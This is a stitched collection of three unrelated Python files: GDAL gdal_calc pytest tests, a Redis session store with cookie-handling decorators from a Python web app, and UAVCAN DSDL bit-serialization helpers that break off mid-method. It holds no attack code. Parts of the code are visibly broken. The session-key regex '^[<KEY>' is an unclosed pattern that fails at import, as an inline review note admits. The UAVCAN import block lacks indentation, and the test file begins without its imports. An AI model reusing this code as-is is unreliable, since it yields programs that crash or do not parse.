def make_temp_filename_list(test_id, test_count, is_opt=False):
    """Return test_count fresh temp filenames for test_id."""
    # List comprehension instead of list(generator) (flake8-comprehensions C400).
    return [make_temp_filename(test_id, is_opt) for _ in range(test_count)]
def test_gdal_calc_py_1():
    """ test basic copy """
    # Guard clauses: the suite needs numpy and the gdal_calc script.
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 1, 3
    out = make_temp_filename_list(test_id, test_count)
    # Identity calc: band 1 (default), band 2 via -A, and band 2 via -Z.
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-Z {} --Z_band=2 --calc=Z --overwrite --outfile {}'.format(infile, out[2]))
    # Each output must reproduce the source band checksum exactly.
    for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
        check_file(out[i], checksum, i+1)
def test_gdal_calc_py_2():
    """ test simple formulas """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 2, 3
    out = make_temp_filename_list(test_id, test_count)
    # A+B, A*B across two bands, and sqrt(A) with a float output type.
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A+B --overwrite --outfile {}'.format(infile, infile, out[0]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 -B {} --B_band 2 --calc=A*B --overwrite --outfile {}'.format(infile, infile, out[1]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --A_band 1 --calc="sqrt(A)" --type=Float32 --overwrite --outfile {}'.format(infile, out[2]))
    # Expected checksums were computed once from known-good outputs.
    for i, checksum in zip(range(test_count), (12368, 62785, 47132)):
        check_file(out[i], checksum, i+1)
#
def test_gdal_calc_py_3():
    """ test --allBands option (simple copy) """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 3, 1
    out = make_temp_filename_list(test_id, test_count)
    # --allBands A applies the identity calc to every band of the input.
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --allBands A --calc=A --overwrite --outfile {}'.format(infile, out[0]))
    bnd_count = 4
    # All four bands of the single output must match the input checksums.
    for i, checksum in zip(range(bnd_count), input_checksum[0:bnd_count]):
        check_file(out[0], checksum, 1, bnd_idx=i+1)
def test_gdal_calc_py_4():
    """ test --allBands option (simple calc) """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 4, 3
    out = make_temp_filename_list(test_id, test_count)
    # some values are clipped to 255, but this doesn't matter... small values were visually checked
    # out[0] holds the constant 1; then A+B mixes all bands of A with band 1 of B.
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=1 --overwrite --outfile {}'.format(infile, out[0]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A+B --NoDataValue=999 --overwrite --outfile {}'.format(infile, out[0], out[1]))
    bnd_count = 3
    for i, checksum in zip(range(bnd_count), (29935, 13128, 59092)):
        check_file(out[1], checksum, 2, bnd_idx=i+1)
    # these values were not tested
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A*B --NoDataValue=999 --overwrite --outfile {}'.format(infile, infile, out[2]))
    bnd_count = 3
    for i, checksum in zip(range(bnd_count), (10025, 62785, 10621)):
        check_file(out[2], checksum, 3, bnd_idx=i+1)
def test_gdal_calc_py_5():
    """ test python interface, basic copy """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 5, 4
    out = make_temp_filename_list(test_id, test_count)
    # Same copies as test 1, but via the gdal_calc.Calc() python API;
    # the last call produces a two-band output from two calc expressions.
    gdal_calc.Calc('A', A=infile, overwrite=True, quiet=True, outfile=out[0])
    gdal_calc.Calc('A', A=infile, A_band=2, overwrite=True, quiet=True, outfile=out[1])
    gdal_calc.Calc('Z', Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[2])
    gdal_calc.Calc(['A', 'Z'], A=infile, Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[3])
    # Only 3 checksums are zipped against range(4): out[3] is deliberately
    # skipped here and verified band-by-band just below.
    for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
        check_file(out[i], checksum, i+1)
    bnd_count = 2
    for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1])):
        check_file(out[3], checksum, 4, bnd_idx=i+1)
def test_gdal_calc_py_6():
    """ test nodata """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    test_id, test_count = 6, 2
    out = make_temp_filename_list(test_id, test_count)
    # Give the input a nodata value of 74, then recode nodata to 1.
    gdal.Translate(out[0], '../gcore/data/byte.tif', options='-a_nodata 74')
    gdal_calc.Calc('A', A=out[0], overwrite=True, quiet=True, outfile=out[1], NoDataValue=1)
    for i, checksum in zip(range(test_count), (4672, 4673)):
        ds = check_file(out[i], checksum, i+1)
        if i == 1:
            # min/max must ignore the new nodata value (1).
            result = ds.GetRasterBand(1).ComputeRasterMinMax()
            assert result == (90, 255), 'Error! min/max not correct!'
        ds = None
def test_gdal_calc_py_7():
    """ test --optfile """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 7, 4
    out = make_temp_filename_list(test_id, test_count)
    opt_files = make_temp_filename_list(test_id, test_count, is_opt=True)
    # Case 1: all options on a single line.
    with open(opt_files[0], 'w') as f:
        f.write('-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
    # Lines in optfiles beginning with '#' should be ignored
    with open(opt_files[1], 'w') as f:
        f.write('-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
        f.write('\n# -A_band=1')
    # options on separate lines should work, too
    opts = '-Z {}'.format(infile), '--Z_band=2', '--calc=Z', '--overwrite', '--outfile {}'.format(out[2])
    with open(opt_files[2], 'w') as f:
        for i in opts:
            f.write(i + '\n')
    # double-quoted options should be read as single arguments. Mixed numbers of arguments per line should work.
    opts = '-Z {} --Z_band=2'.format(infile), '--calc "Z + 0"', '--overwrite --outfile {}'.format(out[3])
    with open(opt_files[3], 'w') as f:
        for i in opts:
            f.write(i + '\n')
    # Every opt-file variant must reproduce the expected band checksum.
    for i, checksum in zip(range(test_count), (input_checksum[0], input_checksum[1], input_checksum[1], input_checksum[1])):
        test_py_scripts.run_py_script(script_path, 'gdal_calc', '--optfile {}'.format(opt_files[i]))
        check_file(out[i], checksum, i+1)
def test_gdal_calc_py_8():
    """ test multiple calcs """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 8, 1
    out = make_temp_filename_list(test_id, test_count)
    # Three --calc expressions produce a single three-band output.
    test_py_scripts.run_py_script(
        script_path, 'gdal_calc',
        '-A {} --A_band=1 -B {} --B_band=2 -Z {} --Z_band=2 --calc=A --calc=B --calc=Z --overwrite --outfile {}'.
        format(infile, infile, infile, out[0]))
    bnd_count = 3
    for i, checksum in zip(range(bnd_count), (input_checksum[0], input_checksum[1], input_checksum[1])):
        check_file(out[0], checksum, 1, bnd_idx=i+1)
def my_sum(a, gdal_dt=None):
    """Sum a sequence of arrays along a new leading axis using numpy.

    gdal_dt (a GDAL type code) selects the accumulator dtype so that the
    sum does not overflow the input dtype.
    """
    accumulator_dtype = GDALTypeCodeToNumericTypeCode(gdal_dt)
    stacked = np.stack(a)
    return stacked.sum(axis=0, dtype=accumulator_dtype)
def my_max(a):
    """Element-wise maximum over a sequence of arrays, via numpy."""
    return np.stack(a).max(axis=0)
def test_gdal_calc_py_9():
    """
    test calculating sum in different ways. testing the following features:
    * noDataValue
    * user_namespace
    * using output ds
    * mem driver (no output file)
    * single alpha for multiple datasets
    * extent = 'fail'
    """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 9, 9
    out = make_temp_filename_list(test_id, test_count)
    common_kwargs = {
        'hideNoData': True,
        'overwrite': True,
        'extent': 'fail',
    }
    inputs0 = dict()
    inputs0['a'] = infile
    total_bands = 3
    checksums = [input_checksum[0], input_checksum[1], input_checksum[2]]
    inputs = []
    # The first intermediate is kept open as a dataset object, the other
    # two are reopened from disk — exercising both input kinds below.
    keep_ds = [True, False, False]
    for i in range(total_bands):
        bnd_idx = i + 1
        inputs0['a_band'] = bnd_idx
        outfile = out[i]
        return_ds = keep_ds[i]
        kwargs = copy(common_kwargs)
        kwargs.update(inputs0)
        ds = gdal_calc.Calc(calc='a', outfile=outfile, **kwargs)
        if return_ds:
            input_file = ds
        else:
            # the dataset must be closed if we are to read it again
            del ds
            input_file = outfile
        inputs.append(input_file)
        check_file(input_file, checksums[i], i+1)
    # inputs1 names the three datasets a/b/c; inputs2 passes all three
    # under a single alpha 'a' (list form).
    inputs1 = dict()
    inputs1['a'] = inputs[0]
    inputs1['b'] = inputs[1]
    inputs1['c'] = inputs[2]
    inputs2 = {'a': inputs}
    write_output = True
    outfile = [out[i] if write_output else None for i in range(test_count)]
    i = total_bands
    # Per-pixel max of the three bands; same expected checksum for all
    # three formulations (named inputs, list input, user_namespace).
    checksum = 13256
    kwargs = copy(common_kwargs)
    kwargs.update(inputs1)
    check_file(gdal_calc.Calc(calc='numpy.max((a,b,c),axis=0)', outfile=outfile[i], **kwargs), checksum, i)
    i += 1
    kwargs = copy(common_kwargs)
    kwargs.update(inputs2)
    check_file(gdal_calc.Calc(calc='numpy.max(a,axis=0)', outfile=outfile[i], **kwargs), checksum, i)
    i += 1
    kwargs = copy(common_kwargs)
    kwargs.update(inputs2)
    check_file(gdal_calc.Calc(calc='my_neat_max(a)', outfile=outfile[i], user_namespace={'my_neat_max': my_max}, **kwargs), checksum, i)
    i += 1
    # for summing 3 bytes we'll use GDT_UInt16
    gdal_dt = gdal.GDT_UInt16
    np_dt = GDALTypeCodeToNumericTypeCode(gdal_dt)
    # sum with overflow
    checksum = 12261
    kwargs = copy(common_kwargs)
    kwargs.update(inputs1)
    check_file(gdal_calc.Calc(calc='a+b+c', type=gdal_dt, outfile=outfile[i], **kwargs), checksum, i)
    i += 1
    # sum with numpy function, no overflow
    checksum = 12789
    kwargs = copy(common_kwargs)
    kwargs.update(inputs2)
    check_file(gdal_calc.Calc(calc='numpy.sum(a,axis=0,dtype=np_dt)', type=gdal_dt, outfile=outfile[i], user_namespace={'np_dt': np_dt}, **kwargs), checksum, i)
    i += 1
    # sum with my custom numpy function
    kwargs = copy(common_kwargs)
    kwargs.update(inputs2)
    check_file(gdal_calc.Calc(calc='my_neat_sum(a, out_dt)', type=gdal_dt, outfile=outfile[i], user_namespace={'my_neat_sum': my_sum, 'out_dt': gdal_dt}, **kwargs), checksum, i)
    i += 1
def test_gdal_calc_py_cleanup():
    """ cleanup all temporary files that were created in this pytest """
    global temp_counter_dict
    global opts_counter_counter
    temp_files = []
    for test_id, count in temp_counter_dict.items():
        for i in range(count):
            temp_files.append(format_temp_filename(test_id, i + 1))
    # Bug fix: this loop used to be nested inside the loop above, so the
    # opt filenames were appended once per test id (duplicates) and were
    # never collected at all when temp_counter_dict was empty.
    for i in range(opts_counter_counter):
        # test_id is ignored for opt files; pass 0 explicitly instead of
        # relying on the leaked loop variable.
        temp_files.append(format_temp_filename(0, i + 1, True))
    for filename in temp_files:
        try:
            os.remove(filename)
        except OSError:
            # Best-effort cleanup: a file may already be gone.
            pass
|
# Copyright 2014 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import re
import msgpack
import msgpack.exceptions
from werkzeug.contrib.sessions import SessionStore, Session as _Session
from warehouse.utils import random_token, vary_by
SESSION_COOKIE_NAME = "session_id"
class RedisSessionStore(SessionStore):
    # Werkzeug session store backed by Redis, serialized with msgpack.
    # NOTE(review): werkzeug.contrib.sessions was removed in werkzeug 1.0;
    # this module presumably targets an older pinned werkzeug — confirm.

    # NOTE(review): this pattern looks corrupted — "[<KEY>" opens a
    # character class that is never closed, so re.compile() raises
    # re.error at import time. Restore the original key-validation
    # pattern before shipping.
    valid_key_regex = re.compile(r"^[<KEY>")
    # Sessions expire after 12 hours of inactivity; refresh() renews this.
    max_age = 12 * 60 * 60  # 12 hours

    def __init__(self, redis, session_class=None, _random_token=random_token):
        """Store sessions in the given redis client; _random_token is
        injectable for deterministic tests."""
        super(RedisSessionStore, self).__init__(session_class=session_class)
        self.redis = redis
        self._random_token = _random_token

    def _redis_key(self, sid):
        # Namespaced redis key for a session id.
        return "warehouse/session/data/{}".format(sid)

    def generate_key(self, salt=None):
        # salt is accepted for interface compatibility but unused here.
        return self._random_token()

    def is_valid_key(self, key):
        # True when the key matches the validation pattern.
        return self.valid_key_regex.search(key) is not None

    def get(self, sid):
        """Load the session for sid, falling back to a fresh session on
        any invalid key, missing entry, or undecodable payload."""
        # Ensure we have a valid key, if not generate a new one
        if not self.is_valid_key(sid):
            return self.new()

        # Fetch the serialized data from redis
        bdata = self.redis.get(self._redis_key(sid))

        # If the session doesn't exist in redis, we'll give the user a new
        # session
        if bdata is None:
            return self.new()

        try:
            # NOTE(review): msgpack removed the encoding= kwarg in 1.0 —
            # confirm the pinned msgpack version supports it.
            data = msgpack.unpackb(bdata, encoding="utf8", use_list=True)
        except (
                msgpack.exceptions.UnpackException,
                msgpack.exceptions.ExtraData):
            # If the session data was invalid we'll give the user a new session
            return self.new()

        # If we were able to load existing session data, load it into a
        # Session class
        session = self.session_class(data, sid, False)

        # Refresh the session in redis to prevent early expiration
        self.refresh(session)

        # Finally return our saved session
        return session

    def save(self, session):
        # Save the session in redis with a sliding max_age expiry.
        self.redis.setex(
            self._redis_key(session.sid),
            self.max_age,
            msgpack.packb(session, encoding="utf8", use_bin_type=True),
        )

    def delete(self, session):
        # Delete the session in redis
        self.redis.delete(self._redis_key(session.sid))

    def refresh(self, session):
        # Refresh the session in redis
        self.redis.expire(self._redis_key(session.sid), self.max_age)

    def cycle(self, session):
        """Re-key the session: copy its data under a fresh sid and delete
        the old entry (used to prevent session fixation)."""
        # Create a new session with all of the data from the old one
        new_session = self.new()
        new_session.update(session)

        # Delete the old session now that we've copied the data
        self.delete(session)

        # Return the new session
        return new_session
class Session(_Session):
    """Werkzeug Session that records cycle/delete requests as flags.

    Views call cycle()/delete(); handle_session inspects ``cycled`` and
    ``deleted`` after the view returns and performs the actual store work.
    """

    def __init__(self, *args, **kwargs):
        super(Session, self).__init__(*args, **kwargs)
        # Both flags start cleared; they are one-way latches set by the
        # methods below.
        self.cycled = self.deleted = False

    def cycle(self):
        """Request that this session's id be regenerated."""
        self.cycled = True

    def delete(self):
        """Request that this session be destroyed."""
        self.deleted = True
def handle_session(fn):
    """Wrap a dispatch method so every request gets a server-side session.

    Loads the session identified by the ``session_id`` cookie (creating a new
    one when the cookie is missing or invalid), exposes it privately as
    ``request._session``, and after the wrapped function returns applies any
    delete/cycle/save operations the view requested, updating the response
    cookie accordingly.
    """
    @functools.wraps(fn)
    def wrapped(self, view, app, request, *args, **kwargs):
        # Short little alias for the session store to make it easier to refer
        # to
        store = app.session_store
        # Look up the session id from the request, and either create a new
        # session or fetch the existing one from the session store
        sid = request.cookies.get(SESSION_COOKIE_NAME, None)
        session = store.new() if sid is None else store.get(sid)
        # Stick the session on the request, but in a private variable. If
        # a view wants to use the session it should use @uses_session to move
        # it to request.session and appropriately vary by Cookie
        request._session = session
        # Call our underlying function in order to get the response to this
        # request
        resp = fn(self, view, app, request, *args, **kwargs)
        # Check to see if the session has been marked to be deleted, if it has
        # tell our session store to delete it, and tell our response to delete
        # the session cookie as well.
        # NOTE(review): despite the deletion, execution continues below — a
        # session that was both deleted and modified will be re-saved and get
        # a fresh cookie.  Confirm this is the intended behavior.
        if session.deleted:
            # Delete in our session store
            store.delete(session)
            # Delete the cookie in the browser
            resp.delete_cookie(SESSION_COOKIE_NAME)
        # Check to see if the session has been marked to be cycled or not.
        # When cycling a session we copy all of the data into a new session
        # and delete the old one.
        if session.cycled:
            session = store.cycle(session)
        # Check to see if the session has been marked to be saved, generally
        # this means that the session data has been modified and thus we need
        # to store the new data.
        if session.should_save:
            store.save(session)
            # Whenever we store new data for our session, we want to issue a
            # new Set-Cookie header so that our expiration date for this
            # session gets reset.
            resp.set_cookie(
                SESSION_COOKIE_NAME,
                session.sid,
                secure=request.is_secure,
                httponly=True,
            )
        # Finally return our response
        return resp
    # Set an attribute so that we can verify the dispatch_view has had session
    # support enabled
    wrapped._sessions_handled = True
    return wrapped
def uses_session(fn):
    """Expose ``request._session`` as ``request.session`` for a view.

    Must be used on views dispatched through handle_session (which sets
    ``request._session``).  The stacked @vary_by decorator adds a
    ``Vary: Cookie`` header, since session-dependent responses differ per
    cookie.
    """
    @functools.wraps(fn)
    @vary_by("Cookie")
    def wrapper(app, request, *args, **kwargs):
        # Add the session onto the request object
        request.session = request._session
        # Call the underlying function
        return fn(app, request, *args, **kwargs)
    return wrapper
|
#
# Copyright (C) 2014-2015 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
from __future__ import division, absolute_import, print_function, unicode_literals
import sys
import time
import math
import copy
import struct
import functools
try:
import collections.abc # Python 3
MutableSequence = collections.abc.MutableSequence
except ImportError:
import collections # Python 2
MutableSequence = collections.MutableSequence
import uavcan
import uavcan.dsdl as dsdl
import uavcan.dsdl.common as common
# Python 2 has a distinct ``long`` type; on Python 3 plain int covers it.
try:
    long
except NameError:
    long = int  # Python 3

if sys.version_info[0] >= 3:
    def bchr(x):
        """Return a single-byte bytes object for the integer *x* (0..255)."""
        return bytes((x,))
else:
    bchr = chr  # Python 2: chr() already produces a one-byte str
def get_uavcan_data_type(obj):
    """Return the DSDL type descriptor attached to a value object."""
    # noinspection PyProtectedMember
    return obj._type
def is_union(obj):
    """Return True if *obj* is a union-mode compound value."""
    if isinstance(obj, CompoundValue):
        # noinspection PyProtectedMember
        return obj._is_union
    raise ValueError('Only CompoundValue can be union')
def get_active_union_field(obj):
    """Return the name of the currently active union field (None if unset)."""
    if is_union(obj):
        # noinspection PyProtectedMember
        return obj._union_field
    raise ValueError('Object is not a union')
def switch_union_field(obj, value):
    """Mark the field named *value* as the active union field of *obj*."""
    if is_union(obj):
        # noinspection PyProtectedMember
        obj._union_field = value
    else:
        raise ValueError('Object is not a union')
def get_fields(obj):
    """Return the ordered mapping of field name to field value object."""
    if isinstance(obj, CompoundValue):
        # noinspection PyProtectedMember
        return obj._fields
    raise ValueError('Only CompoundValue can have fields')
def get_constants(obj):
    """Return the mapping of constant name to constant value."""
    if isinstance(obj, CompoundValue):
        # noinspection PyProtectedMember
        return obj._constants
    raise ValueError('Only CompoundValue can have constants')
def is_request(obj):
    """Return True if *obj* is the request part of a service data type."""
    # noinspection PyProtectedMember
    return obj._mode == 'request'
def is_response(obj):
    """Return True if *obj* is the response part of a service data type."""
    # noinspection PyProtectedMember
    return obj._mode == 'response'
def bits_from_bytes(s):
    """Return the bits of byte sequence *s* as a '0'/'1' string, MSB first."""
    return "".join(map("{0:08b}".format, s))
def bytes_from_bits(s):
    """Convert a bit string to a bytearray, zero-padding up to a byte boundary."""
    remainder = len(s) % 8
    if remainder:
        # Pad on the right so the final partial octet becomes a full byte
        s += "0" * (8 - remainder)
    return bytearray(int(s[i:i + 8], 2) for i in range(0, len(s), 8))
def be_from_le_bits(s, bitlen):
    """Reverse the byte (octet) order of bit string *s*, keeping *bitlen* bits.

    Raises ValueError if *s* holds fewer than *bitlen* bits; extra trailing
    bits are dropped.
    """
    if len(s) < bitlen:
        raise ValueError("Not enough bits; need {0} but got {1}".format(bitlen, len(s)))
    s = s[:bitlen]
    octets = [s[i:i + 8] for i in range(0, len(s), 8)]
    return "".join(reversed(octets))
def le_from_be_bits(s, bitlen):
    """Reverse the byte (octet) order of bit string *s* from its tail.

    Keeps the last *bitlen* bits and emits their octets back-to-front;
    raises ValueError if *s* holds fewer than *bitlen* bits.
    """
    if len(s) < bitlen:
        raise ValueError("Not enough bits; need {0} but got {1}".format(bitlen, len(s)))
    s = s[len(s) - bitlen:]
    octets = []
    end = len(s)
    while end > 0:
        octets.append(s[max(0, end - 8):end])
        end -= 8
    return "".join(octets)
def format_bits(s):
    """Group a bit string into space-separated octets for display."""
    octets = [s[i:i + 8] for i in range(0, len(s), 8)]
    return " ".join(octets)
def union_tag_bits_from_num_elements(num_elements):
    """Return the number of bits needed for a union tag addressing
    *num_elements* fields, i.e. ceil(log2(num_elements)).

    Computed with integer bit_length() instead of math.log/math.ceil, which
    can misround near large powers of two due to floating-point error.
    """
    return (num_elements - 1).bit_length()
def array_len_bits_from_max_size(max_size):
    """Return the number of bits needed to encode a dynamic-array length in
    the range [0, max_size], i.e. ceil(log2(max_size + 1)).

    Computed with integer bit_length() instead of math.log/math.ceil, which
    can misround near large powers of two due to floating-point error.
    """
    return max_size.bit_length()
def enum_mark_last(iterable, start=0):
    """
    Yield (index, is_last, item) for every item of *iterable*, where is_last
    is True only for the final item.  Indexing begins at *start*.
    Usage:
    >>> iterable = range(10)
    >>> for index, is_last, item in enum_mark_last(iterable):
    >>>     print(index, item, end='\n' if is_last else ', ')
    """
    iterator = iter(iterable)
    try:
        pending = next(iterator)
    except StopIteration:
        return  # Empty input yields nothing
    index = start
    for current in iterator:
        # ``pending`` cannot be last: another item just arrived
        yield index, False, pending
        pending = current
        index += 1
    yield index, True, pending
class Float32IntegerUnion(object):
    """Emulates a C union over 4 shared bytes:
    union FloatIntegerUnion
    {
        std::uint32_t u;
        float f;
    };
    Reading .u or .f reinterprets the same storage as native-endian uint32 or
    float32 respectively.
    """
    def __init__(self, integer=None, floating_point=None):
        # Start zero-initialized, then apply whichever view was supplied
        self._bytes = struct.pack("=L", 0)
        if integer is not None:
            assert floating_point is None
            self.u = int(integer)
        if floating_point is not None:
            self.f = float(floating_point)

    def _view(self, fmt):
        # Decode the shared 4-byte storage with the given struct format
        return struct.unpack(fmt, self._bytes)[0]

    @property
    def f(self):
        return self._view("=f")

    @f.setter
    def f(self, value):
        assert isinstance(value, float)
        self._bytes = struct.pack("=f", value)

    @property
    def u(self):
        return self._view("=I")

    @u.setter
    def u(self, value):
        assert isinstance(value, (int, long))
        self._bytes = struct.pack("=I", value)
def f16_from_f32(float32):
    """Convert a Python float to its IEEE 754 binary16 bit pattern (int)."""
    # Directly translated from libuavcan's implementation in C++
    f32infty = Float32IntegerUnion(integer=255 << 23)
    f16infty = Float32IntegerUnion(integer=31 << 23)
    magic = Float32IntegerUnion(integer=15 << 23)
    inval = Float32IntegerUnion(floating_point=float32)
    sign_mask = 0x80000000
    round_mask = ~0xFFF
    # Strip the sign; it is re-attached at the end, shifted into bit 15
    sign = inval.u & sign_mask
    inval.u ^= sign
    if inval.u >= f32infty.u:  # Inf or NaN (all exponent bits set)
        out = 0x7FFF if inval.u > f32infty.u else 0x7C00
    else:
        # Drop low mantissa bits, rebias the exponent via a float multiply,
        # then undo the rounding offset — yields the half-precision bits
        inval.u &= round_mask
        inval.f *= magic.f
        inval.u -= round_mask
        if inval.u > f16infty.u:
            inval.u = f16infty.u  # Clamp to signed infinity if overflowed
        out = (inval.u >> 13) & 0xFFFF  # Take the bits!
    return out | (sign >> 16) & 0xFFFF
def f32_from_f16(float16):
    """Convert an IEEE 754 binary16 bit pattern (int) to a Python float."""
    # Directly translated from libuavcan's implementation in C++
    magic = Float32IntegerUnion(integer=(254 - 15) << 23)
    was_inf_nan = Float32IntegerUnion(integer=(127 + 16) << 23)
    out = Float32IntegerUnion(integer=(float16 & 0x7FFF) << 13)  # exponent/mantissa bits
    out.f *= magic.f  # exponent adjust
    if out.f >= was_inf_nan.f:  # make sure Inf/NaN survive
        out.u |= 255 << 23
    out.u |= (float16 & 0x8000) << 16  # sign bit
    return out.f
def cast(value, dtype):
    """Coerce *value* into the representable range of primitive type *dtype*.

    Saturated mode clamps to the type's value range; truncated floats map
    out-of-range values to +/-inf (NaN passes through); truncated integers
    are masked to the type's bit length.
    """
    mode = dtype.cast_mode
    if mode == dsdl.PrimitiveType.CAST_MODE_SATURATED:
        if value > dtype.value_range[1]:
            return dtype.value_range[1]
        if value < dtype.value_range[0]:
            return dtype.value_range[0]
        return value
    if mode == dsdl.PrimitiveType.CAST_MODE_TRUNCATED and dtype.kind == dsdl.PrimitiveType.KIND_FLOAT:
        if not math.isnan(value):
            if value > dtype.value_range[1]:
                value = float("+inf")
            elif value < dtype.value_range[0]:
                value = float("-inf")
        return value
    if mode == dsdl.PrimitiveType.CAST_MODE_TRUNCATED:
        # Keep only the low bitlen bits
        return value & ((1 << dtype.bitlen) - 1)
    raise ValueError("Invalid cast_mode: " + repr(dtype))
class BaseValue(object):
    """Common state for all serializable DSDL values.

    The raw value is held in ``_bits`` as a big-endian bit string; subclasses
    interpret it according to their DSDL type descriptor in ``_type``.
    """
    # noinspection PyUnusedLocal
    def __init__(self, _uavcan_type, *_args, **_kwargs):
        self._type = _uavcan_type
        self._bits = None

    def _unpack(self, stream, tao):
        """Consume this value's bits from *stream*; return the remainder."""
        bitlen = self._type.bitlen
        if not bitlen:
            return stream
        self._bits = be_from_le_bits(stream, bitlen)
        return stream[bitlen:]

    def _pack(self, tao):
        """Serialize to a bit string of the type's exact bit length."""
        if not self._bits:
            return "0" * self._type.bitlen
        return le_from_be_bits(self._bits, self._type.bitlen)
class VoidValue(BaseValue):
    """Padding field: carries no data and serializes as all-zero bits."""

    def _unpack(self, stream, tao):
        # Skip the padding bits without storing anything
        return stream[self._type.bitlen:]

    def _pack(self, tao):
        return self._type.bitlen * "0"
class PrimitiveValue(BaseValue):
    """Scalar DSDL value: boolean, signed/unsigned integer, or float.

    The raw representation is the inherited big-endian bit string ``_bits``;
    the ``value`` property converts to and from native Python types based on
    the DSDL primitive kind and bit length.
    """
    def __init__(self, _uavcan_type, *args, **kwargs):
        super(PrimitiveValue, self).__init__(_uavcan_type, *args, **kwargs)
        # Default initialization
        self.value = 0
    def __repr__(self):
        return repr(self.value)
    @property
    def value(self):
        # None means the value was never assigned or unpacked
        if not self._bits:
            return None
        int_value = int(self._bits, 2)
        if self._type.kind == dsdl.PrimitiveType.KIND_BOOLEAN:
            return bool(int_value)
        elif self._type.kind == dsdl.PrimitiveType.KIND_UNSIGNED_INT:
            return int_value
        elif self._type.kind == dsdl.PrimitiveType.KIND_SIGNED_INT:
            # Undo two's complement for negative values
            if int_value >= (1 << (self._type.bitlen - 1)):
                int_value = -((1 << self._type.bitlen) - int_value)
            return int_value
        elif self._type.kind == dsdl.PrimitiveType.KIND_FLOAT:
            # Reinterpret the raw bits as IEEE 754 of the matching width
            if self._type.bitlen == 16:
                return f32_from_f16(int_value)
            elif self._type.bitlen == 32:
                return struct.unpack("<f", struct.pack("<L", int_value))[0]
            elif self._type.bitlen == 64:
                return struct.unpack("<d", struct.pack("<Q", int_value))[0]
            else:
                raise ValueError('Bad float')
    @value.setter
    def value(self, new_value):
        if new_value is None:
            raise ValueError("Can't serialize a None value")
        elif self._type.kind == dsdl.PrimitiveType.KIND_BOOLEAN:
            self._bits = "1" if new_value else "0"
        elif self._type.kind == dsdl.PrimitiveType.KIND_UNSIGNED_INT:
            new_value = cast(new_value, self._type)
            self._bits = format(new_value, "0" + str(self._type.bitlen) + "b")
        elif self._type.kind == dsdl.PrimitiveType.KIND_SIGNED_INT:
            new_value = cast(new_value, self._type)
            if new_value < 0:  # Computing two's complement for negatives
                new_value += 2 ** self._type.bitlen
            self._bits = format(new_value, "0" + str(self._type.bitlen) + "b")
